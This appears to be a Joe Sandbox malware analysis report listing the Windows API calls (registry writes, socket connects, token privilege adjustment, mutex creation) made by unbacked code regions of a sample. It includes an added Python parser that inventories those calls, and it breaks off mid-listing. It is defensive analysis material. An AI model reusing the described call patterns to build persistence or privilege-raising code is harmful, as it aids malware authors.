                                                                                                                                                                    execution_graph 4607 ffb27e 4609 ffb2b3 WriteFile 4607->4609 4610 ffb2e5 4609->4610 4812 ffb17c 4813 ffb1be GetFileType 4812->4813 4815 ffb220 4813->4815 4611 ffae7a 4612 ffaeaf SetTimer 4611->4612 4613 ffaeda 4611->4613 4614 ffaec4 4612->4614 4613->4612 4615 ffaa7a 4616 ffaacf 4615->4616 4617 ffaaa6 SetErrorMode 4615->4617 4616->4617 4618 ffaabb 4617->4618 4748 5170d92 4749 5170db2 MapViewOfFile 4748->4749 4751 5170e39 4749->4751 4623 1132818 KiUserExceptionDispatcher 4624 113285c 4623->4624 4784 5171c1a 4785 5171c50 FormatMessageW 4784->4785 4787 5171cda 4785->4787 4720 ffb4ee 4723 ffb522 CreateMutexW 4720->4723 4722 ffb59d 4723->4722 4788 ffb5ec 4790 ffb5f9 SendMessageTimeoutA 4788->4790 4791 ffb6ad 4790->4791 4816 5171e80 4817 5171ea2 RegCreateKeyExW 4816->4817 4819 5171f4c 4817->4819 4644 ffbede 4645 ffbf0a DispatchMessageW 4644->4645 4646 ffbf33 4644->4646 4647 ffbf1f 4645->4647 4646->4645 4724 ffaadd 4726 ffab0e RegOpenKeyExW 4724->4726 4727 ffab9c 4726->4727 4648 ffa45a 4649 ffa4aa GetComputerNameW 4648->4649 4650 ffa4b8 4649->4650 4655 5171832 4656 5171861 AdjustTokenPrivileges 4655->4656 4658 5171883 4656->4658 4820 ffa35a 4821 ffa38e FindCloseChangeNotification 4820->4821 4823 ffa3c8 4821->4823 4728 517073e 4729 517075e WSASocketW 4728->4729 4731 51707d2 4729->4731 4792 ffabd5 4793 ffac16 RegQueryValueExW 4792->4793 4795 ffac9f 4793->4795 4752 51715ba 4755 51715ea WSAConnect 4752->4755 4754 517163e 4755->4754 4756 ffb24c 4757 ffb27e WriteFile 4756->4757 4759 ffb2e5 4757->4759 4760 ffae3f 4763 ffae7a SetTimer 4760->4763 4762 ffaec4 4763->4762 4732 ffbebc 4733 ffbede DispatchMessageW 4732->4733 4735 ffbf1f 4733->4735 4764 ffaa3a 4765 ffaa7a SetErrorMode 4764->4765 4767 ffaabb 4765->4767 4681 ffa9b6 4682 ffaa2c 4681->4682 4683 ffa9f4 DuplicateHandle 4681->4683 4682->4683 4684 ffaa02 4683->4684 
4768 5170bdc 4769 5170c02 ConvertStringSecurityDescriptorToSecurityDescriptorW 4768->4769 4771 5170c7b 4769->4771 4772 ffa432 4773 ffa45a GetComputerNameW 4772->4773 4775 ffa4b8 4773->4775 4824 ffb327 4825 ffb362 RegSetValueExW 4824->4825 4827 ffb3e3 4825->4827 4692 ffb0a6 4694 ffb0de CreateFileW 4692->4694 4695 ffb12d 4694->4695 4736 5171b4b 4737 5171b6e SetProcessWorkingSetSize 4736->4737 4739 5171bcf 4737->4739 4696 ffb522 4697 ffb55a CreateMutexW 4696->4697 4699 ffb59d 4697->4699 4800 5171676 4802 51716b2 LookupPrivilegeValueW 4800->4802 4803 5171702 4802->4803 4740 517197d 4741 51719ae GetExitCodeProcess 4740->4741 4743 5171a0c 4741->4743 4776 51717fb 4777 5171805 AdjustTokenPrivileges 4776->4777 4779 5171883 4777->4779 4804 5171a67 4806 5171a8a GetProcessWorkingSetSize 4804->4806 4807 5171aeb 4806->4807 4704 ffa38e 4705 ffa3ba FindCloseChangeNotification 4704->4705 4706 ffa3f9 4704->4706 4707 ffa3c8 4705->4707 4706->4705 4828 51712e0 4829 51712fe GetProcessTimes 4828->4829 4831 5171385 4829->4831 4808 ffa986 4809 ffa9b6 DuplicateHandle 4808->4809 4811 ffaa02 4809->4811 4744 ffb084 4746 ffb0a6 CreateFileW 4744->4746 4747 ffb12d 4746->4747 4780 51713e8 4781 517140a getaddrinfo 4780->4781 4783 51714b7 4781->4783
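The execution_graph listing above and the per-function "APIs" bullets below are the raw material for an API inventory of the unbacked code regions (0xFFA000 and 0x5170000, both "based on PE: false"). The following Python parser is an added example, not part of the Joe Sandbox report or its tooling: it tokenises the graph text into nodes, edges and the API name attached to each node, parses the "Api.MODULE(args), ref: ADDR" bullets, groups calls by 64 KiB region and flags the LookupPrivilegeValueW/AdjustTokenPrivileges token-privilege chain. The behaviour buckets in API_CATEGORIES are triage labels chosen here, and the two excerpt constants are copied from this report's listing as constructed test input.

```python
"""Turn Joe Sandbox execution_graph / API listings into a quick API inventory.

Added example, not part of the sandbox report. The behaviour buckets are
triage labels chosen here, not categories defined by Joe Sandbox.
"""
import re
from collections import defaultdict

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")           # "4607->4609"
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")            # node address, e.g. "ffb27e"
API_REF_RE = re.compile(                          # "• Api.MODULE(args), ref: ADDR"
    r"(?:\u2022\s*)?(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Coarse triage buckets (assumption: grouping chosen here, not the report's).
API_CATEGORIES = {
    "registry": {"RegCreateKeyExW", "RegOpenKeyExW", "RegQueryValueExW", "RegSetValueExW"},
    "network": {"WSASocketW", "WSAConnect", "getaddrinfo"},
    "privilege": {"LookupPrivilegeValueW", "AdjustTokenPrivileges", "DuplicateHandle"},
    "file": {"CreateFileW", "WriteFile", "GetFileType", "MapViewOfFile"},
}

# Excerpts copied from this report's execution_graph and API bullets (constructed test input).
GRAPH_EXCERPT = (
    "execution_graph 4607 ffb27e 4609 ffb2b3 WriteFile 4607->4609 4610 ffb2e5 4609->4610 "
    "4623 1132818 KiUserExceptionDispatcher 4624 113285c 4623->4624 "
    "4816 5171e80 4817 5171ea2 RegCreateKeyExW 4816->4817 4819 5171f4c 4817->4819 "
    "4655 5171832 4656 5171861 AdjustTokenPrivileges 4655->4656 4658 5171883 4656->4658 "
    "4800 5171676 4802 51716b2 LookupPrivilegeValueW 4800->4802 4803 5171702 4802->4803 "
    "4780 51713e8 4781 517140a getaddrinfo 4780->4781 4783 51714b7 4781->4783"
)
API_LINES_EXCERPT = [
    "• AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0517187B",
    "• RegCreateKeyExW.KERNEL32(?,00000E84), ref: 05171F3D",
    "• getaddrinfo.WS2_32(?,00000E84), ref: 051714AF",
    "• GetProcessTimes.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 0517137D",
]


def parse_execution_graph(text):
    """Return (nodes, edges). nodes: id -> (addr, [api names]); edges: [(src, dst)].

    Tokens come as "<id> <addr> [<ApiName>...]" node groups and "<id>-><id>" edges;
    an API name is attached to the node group it directly follows.
    """
    nodes, edges = {}, []
    tokens = text.split()
    if tokens and tokens[0] == "execution_graph":
        tokens = tokens[1:]
    current, i = None, 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
            current = None
        elif tok.isdigit() and i + 1 < len(tokens) and HEX_RE.match(tokens[i + 1]):
            current = int(tok)
            nodes[current] = (tokens[i + 1], [])
            i += 1  # consume the address token as well
        elif current is not None:
            nodes[current][1].append(tok)
        i += 1
    return nodes, edges


def parse_api_refs(lines):
    """Parse '• Api.MODULE(args), ref: ADDR' bullets into dicts with an argument count."""
    refs = []
    for line in lines:
        m = API_REF_RE.search(line)
        if m:
            d = m.groupdict()
            d["argc"] = len([a for a in d["args"].split(",") if a.strip()])
            refs.append(d)
    return refs


def categorise(api_names):
    """Bucket API names; anything outside API_CATEGORIES lands in 'other'."""
    buckets = defaultdict(set)
    for name in api_names:
        cat = next((c for c, members in API_CATEGORIES.items() if name in members), "other")
        buckets[cat].add(name)
    return {c: sorted(v) for c, v in buckets.items()}


def summarise(graph_text, api_lines):
    """Group called APIs by 64 KiB region (the dumps here are unbacked: 'based on PE: false')."""
    nodes, edges = parse_execution_graph(graph_text)
    by_region = defaultdict(set)
    for addr, apis in nodes.values():
        region = f"0x{((int(addr, 16) >> 16) << 16):X}"
        by_region[region].update(apis)
    all_apis = set().union(*by_region.values()) if by_region else set()
    return {
        "node_count": len(nodes),
        "edge_count": len(edges),
        "apis_by_region": {r: sorted(v) for r, v in sorted(by_region.items())},
        "categories": categorise(all_apis),
        # Token privilege enable chain: look up the LUID, then adjust the token.
        "privilege_chain": {"LookupPrivilegeValueW", "AdjustTokenPrivileges"} <= all_apis,
        "refs": parse_api_refs(api_lines),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(summarise(GRAPH_EXCERPT, API_LINES_EXCERPT), indent=2))
```

Run it against the full execution_graph text of a report to get, per dumped region, which APIs the unbacked code reaches; the region split matters here because the 0x5170000 region holds the registry, socket and token-privilege calls while 0xFFA000 holds the file, mutex and message-loop calls, which is the shape one expects from an unpacked RAT stage rather than the .NET loader.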
                                                                                                                                                                    APIs
                                                                                                                                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0517187B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AdjustPrivilegesToken
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2874748243-0
                                                                                                                                                                    • Opcode ID: 0dbea6fdab44a8165cf46771ab8e5918f6e3ef960fee5b387d654a290caf34cf
                                                                                                                                                                    • Instruction ID: cb096f243388de2c2c31ec4abd9a1b929e8097eb5fbd28f77e1309854cebf117
                                                                                                                                                                    • Opcode Fuzzy Hash: 0dbea6fdab44a8165cf46771ab8e5918f6e3ef960fee5b387d654a290caf34cf
                                                                                                                                                                    • Instruction Fuzzy Hash: 3721B175509384AFEB228F25DC44B62BFF4FF06310F08859AE9858B163D331D918CB62
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0517187B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AdjustPrivilegesToken
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2874748243-0
                                                                                                                                                                    • Opcode ID: 3f621de5ef7e34f691b299fcc3950c1431e8fd960d0efd9265f604661f67b3fc
                                                                                                                                                                    • Instruction ID: ae75985cb0105c116078ff8e662ed7433807cc4f8a7bdfc5c316438e9deaa6e0
                                                                                                                                                                    • Opcode Fuzzy Hash: 3f621de5ef7e34f691b299fcc3950c1431e8fd960d0efd9265f604661f67b3fc
                                                                                                                                                                    • Instruction Fuzzy Hash: ED117076600204AFEB20CF59D884B66FBF4FF04320F08C56AED498B652D735E458CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 669 5171e80-5171efa 673 5171eff-5171f0b 669->673 674 5171efc 669->674 675 5171f10-5171f19 673->675 676 5171f0d 673->676 674->673 677 5171f1e-5171f35 675->677 678 5171f1b 675->678 676->675 680 5171f77-5171f7c 677->680 681 5171f37-5171f4a RegCreateKeyExW 677->681 678->677 680->681 682 5171f7e-5171f83 681->682 683 5171f4c-5171f74 681->683 682->683
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegCreateKeyExW.KERNEL32(?,00000E84), ref: 05171F3D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Create
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2289755597-0
                                                                                                                                                                    • Opcode ID: ff95d0c704c2da24ca378b137dfc919f922cc5d12e310ab01c9a56b9fcb6e59e
                                                                                                                                                                    • Instruction ID: 56d78863d73f1e05dbf619a1ca8c96c4e7f2872a177f26c8db47d2b00629cf7b
                                                                                                                                                                    • Opcode Fuzzy Hash: ff95d0c704c2da24ca378b137dfc919f922cc5d12e310ab01c9a56b9fcb6e59e
                                                                                                                                                                    • Instruction Fuzzy Hash: 90319072504348AFEB228B25CC44FA7BBFCEF05614F08855AF985D7652D324E519CB71
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    control_flow_graph 688 517064b-517066b 689 517068d-51706bf 688->689 690 517066d-517068c 688->690 694 51706c2-517071a RegQueryValueExW 689->694 690->689 696 5170720-5170736 694->696
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegQueryValueExW.KERNEL32(?,00000E84,?,?), ref: 05170712
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: QueryValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3660427363-0
                                                                                                                                                                    • Opcode ID: 734d8010591d23a4dcb922b369acd9c2ee2108cc13dad681b7d136fe520efd94
                                                                                                                                                                    • Instruction ID: 730b66f155208189d5cd60d716ce526b1a387dd0d491d60018a6df90f0687ff0
                                                                                                                                                                    • Opcode Fuzzy Hash: 734d8010591d23a4dcb922b369acd9c2ee2108cc13dad681b7d136fe520efd94
                                                                                                                                                                    • Instruction Fuzzy Hash: 9C31907110E3C06FD3138B258C65A61BFB4EF87610B0E45CBD8C48F5A3D2296919C7B2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    control_flow_graph 713 51713e8-51714a7 719 51714f9-51714fe 713->719 720 51714a9-51714b1 getaddrinfo 713->720 719->720 721 51714b7-51714c9 720->721 723 5171500-5171505 721->723 724 51714cb-51714f6 721->724 723->724
                                                                                                                                                                    APIs
                                                                                                                                                                    • getaddrinfo.WS2_32(?,00000E84), ref: 051714AF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: getaddrinfo
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 300660673-0
                                                                                                                                                                    • Opcode ID: 899524a25b8e7bedf52c10f4ab18aef753b751efd3d3b5a0dd494b13d6d1a67b
                                                                                                                                                                    • Instruction ID: 42231d67ee6d97697c3caf461665ec8caa7f0dc5ab90e8143281be7eb02b845b
                                                                                                                                                                    • Opcode Fuzzy Hash: 899524a25b8e7bedf52c10f4ab18aef753b751efd3d3b5a0dd494b13d6d1a67b
                                                                                                                                                                    • Instruction Fuzzy Hash: CA31B372104344AFEB21CB51CC44FA6FBACEF04314F04449AFA499B592D775A909CB65
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    control_flow_graph 697 ffb5ec-ffb5f7 698 ffb5f9-ffb67c 697->698 699 ffb664-ffb669 697->699 701 ffb67f-ffb69d 698->701 699->701 702 ffb66b-ffb67c 699->702 705 ffb69f-ffb6a7 SendMessageTimeoutA 701->705 706 ffb6e1-ffb6e6 701->706 702->701 708 ffb6ad-ffb6bf 705->708 706->705 709 ffb6e8-ffb6ed 708->709 710 ffb6c1-ffb6de 708->710 709->710
                                                                                                                                                                    APIs
                                                                                                                                                                    • SendMessageTimeoutA.USER32(?,00000E84), ref: 00FFB6A5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: MessageSendTimeout
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1599653421-0
                                                                                                                                                                    • Opcode ID: c31ac4edfedd2fc5de1734792679d9e222e93779302fedb7a022f7cec2f2bfbc
                                                                                                                                                                    • Instruction ID: e4f2c6677be48ecb7c2a6d070d83495b3d3e15f900177002940dc3551e544c52
                                                                                                                                                                    • Opcode Fuzzy Hash: c31ac4edfedd2fc5de1734792679d9e222e93779302fedb7a022f7cec2f2bfbc
                                                                                                                                                                    • Instruction Fuzzy Hash: 76310872504344AFEB228F21DC45FA2FFB4FF45320F18849AE9849B5A2D335A909DB65
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    control_flow_graph 728 5171c1a-5171c7f 730 5171c82-5171cd4 FormatMessageW 728->730 732 5171cda-5171d03 730->732
                                                                                                                                                                    APIs
                                                                                                                                                                    • FormatMessageW.KERNEL32(?,00000E84,?,?), ref: 05171CD2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FormatMessage
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1306739567-0
                                                                                                                                                                    • Opcode ID: 346ee915507dcadf75618cdab29928eef2a329c3bf2d565efc7b616e31b405d1
                                                                                                                                                                    • Instruction ID: b66d73b31765ed6e33797e704f222b2abb54207b89e789e1524498f6ce94b760
                                                                                                                                                                    • Opcode Fuzzy Hash: 346ee915507dcadf75618cdab29928eef2a329c3bf2d565efc7b616e31b405d1
                                                                                                                                                                    • Instruction Fuzzy Hash: F4316F7250D3C45FD7038B218C55A66BFB4EF87610F0984CBD8849F6A3E6256919C7A2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    control_flow_graph 765 51712e0-5171375 770 5171377-517137f GetProcessTimes 765->770 771 51713c2-51713c7 765->771 772 5171385-5171397 770->772 771->770 774 51713c9-51713ce 772->774 775 5171399-51713bf 772->775 774->775
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessTimes.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 0517137D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ProcessTimes
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1995159646-0
                                                                                                                                                                    • Opcode ID: 4d687f34620d296b754d1277ae17255f4dee7ecdcde8bbb66780ce05b4e0a03b
                                                                                                                                                                    • Instruction ID: 292894e96e796cdaf4539bac402ab6049eacb88ffe5e306ac4ab8caf313c05cb
                                                                                                                                                                    • Opcode Fuzzy Hash: 4d687f34620d296b754d1277ae17255f4dee7ecdcde8bbb66780ce05b4e0a03b
                                                                                                                                                                    • Instruction Fuzzy Hash: C331F5725093846FEB128F21DC44FA6BFB8EF06320F08849AE984CB593D3259519C775
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 734 ffaadd-ffab69 738 ffab6e-ffab85 734->738 739 ffab6b 734->739 741 ffabc7-ffabcc 738->741 742 ffab87-ffab9a RegOpenKeyExW 738->742 739->738 741->742 743 ffabce-ffabd3 742->743 744 ffab9c-ffabc4 742->744 743->744
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyExW.KERNEL32(?,00000E84), ref: 00FFAB8D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Open
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                                                    • Opcode ID: dfb8f966498ac980527f38b2460357fd7ea7dff402ac0938847d635aba4d3fc9
                                                                                                                                                                    • Instruction ID: f3ce0b6516056fa45b52daaa791c84c95c390110618e36d49dfaa1ae585db7cf
                                                                                                                                                                    • Opcode Fuzzy Hash: dfb8f966498ac980527f38b2460357fd7ea7dff402ac0938847d635aba4d3fc9
                                                                                                                                                                    • Instruction Fuzzy Hash: 963182B6409344AFE7228B11CC44FA6BFBCEF45314F08849AEA458B653D224A959CB76
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 749 ffb084-ffb0fe 753 ffb103-ffb10f 749->753 754 ffb100 749->754 755 ffb114-ffb11d 753->755 756 ffb111 753->756 754->753 757 ffb11f-ffb143 CreateFileW 755->757 758 ffb16e-ffb173 755->758 756->755 761 ffb175-ffb17a 757->761 762 ffb145-ffb16b 757->762 758->757 761->762
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 00FFB125
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                    • Opcode ID: d77bc31cf5f75c15f68e4530fb50a5b545990930ee4d5548811b4239c317320a
                                                                                                                                                                    • Instruction ID: 0e05ebba5f1716013b76aeeeb4527d592c4d92aa98959ddef1f66b1c50de814f
                                                                                                                                                                    • Opcode Fuzzy Hash: d77bc31cf5f75c15f68e4530fb50a5b545990930ee4d5548811b4239c317320a
                                                                                                                                                                    • Instruction Fuzzy Hash: 0731AF71504344AFE721CF26CC44F66BBE8EF05720F08849EE9858B662D375E819DB71
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E84), ref: 05170C73
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DescriptorSecurity$ConvertString
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3907675253-0
                                                                                                                                                                    • Opcode ID: d3bae8f234ee07f4a4b2be40a9f8d791a8088681156b0a0df340ec9e9c53164e
                                                                                                                                                                    • Instruction ID: 149a62f24e311e524743f3a4d9a281b0e01ec245209b54b8b15cdeaeb6d3dd48
                                                                                                                                                                    • Opcode Fuzzy Hash: d3bae8f234ee07f4a4b2be40a9f8d791a8088681156b0a0df340ec9e9c53164e
                                                                                                                                                                    • Instruction Fuzzy Hash: 9631C172504344AFEB21CB25DC49FA7BFF8EF05310F08889AE944CB652D324E809CB62
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateMutexW.KERNEL32(?,?), ref: 00FFB595
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutex
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1964310414-0
                                                                                                                                                                    • Opcode ID: 6f4f877137b21ef7d6dff99031d2ae719371303cc51381adcbfa09c277a67996
                                                                                                                                                                    • Instruction ID: 99496125b23808fefed1e48f517c5f33de06e985257ceb6319221aaaaee57c06
                                                                                                                                                                    • Opcode Fuzzy Hash: 6f4f877137b21ef7d6dff99031d2ae719371303cc51381adcbfa09c277a67996
                                                                                                                                                                    • Instruction Fuzzy Hash: 743193715093846FE711CB25DC85BA6BFF8EF06310F08849AE984CB293D375E909C762
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 778 ffabd5-ffac53 781 ffac58-ffac61 778->781 782 ffac55 778->782 783 ffac66-ffac6c 781->783 784 ffac63 781->784 782->781 785 ffac6e 783->785 786 ffac71-ffac88 783->786 784->783 785->786 788 ffacbf-ffacc4 786->788 789 ffac8a-ffac9d RegQueryValueExW 786->789 788->789 790 ffac9f-ffacbc 789->790 791 ffacc6-ffaccb 789->791 791->790
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegQueryValueExW.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 00FFAC90
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: QueryValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3660427363-0
                                                                                                                                                                    • Opcode ID: 3173760a2edc2bfddd6727e2b963110fe33125a95e859ce36e49ad66f2279f4d
                                                                                                                                                                    • Instruction ID: dc154c55aa5c9761582f0b0ccd5b0945e9ef8b3e59414ef7459c321087b59c8f
                                                                                                                                                                    • Opcode Fuzzy Hash: 3173760a2edc2bfddd6727e2b963110fe33125a95e859ce36e49ad66f2279f4d
                                                                                                                                                                    • Instruction Fuzzy Hash: 7B31B7755053846FD722CF21CC44F62BFF8EF06720F08849AE988CB663D264E949CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • RegCreateKeyExW.KERNEL32(?,00000E84), ref: 05171F3D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Create
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2289755597-0
                                                                                                                                                                    • Opcode ID: 0d76dbbb38c8970a382a89323a765ea3a8a84bc9a0c74b424782b4a229fc1128
                                                                                                                                                                    • Instruction ID: a54d11478ed933eccfb6798c46e7bff1bd076e51b9b644758a6a3efafe9c2336
                                                                                                                                                                    • Opcode Fuzzy Hash: 0d76dbbb38c8970a382a89323a765ea3a8a84bc9a0c74b424782b4a229fc1128
                                                                                                                                                                    • Instruction Fuzzy Hash: 36218D76600208AFEB21CF29CC44FA7BBFCEF08614F04855AE945D7A52E734E519CA61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
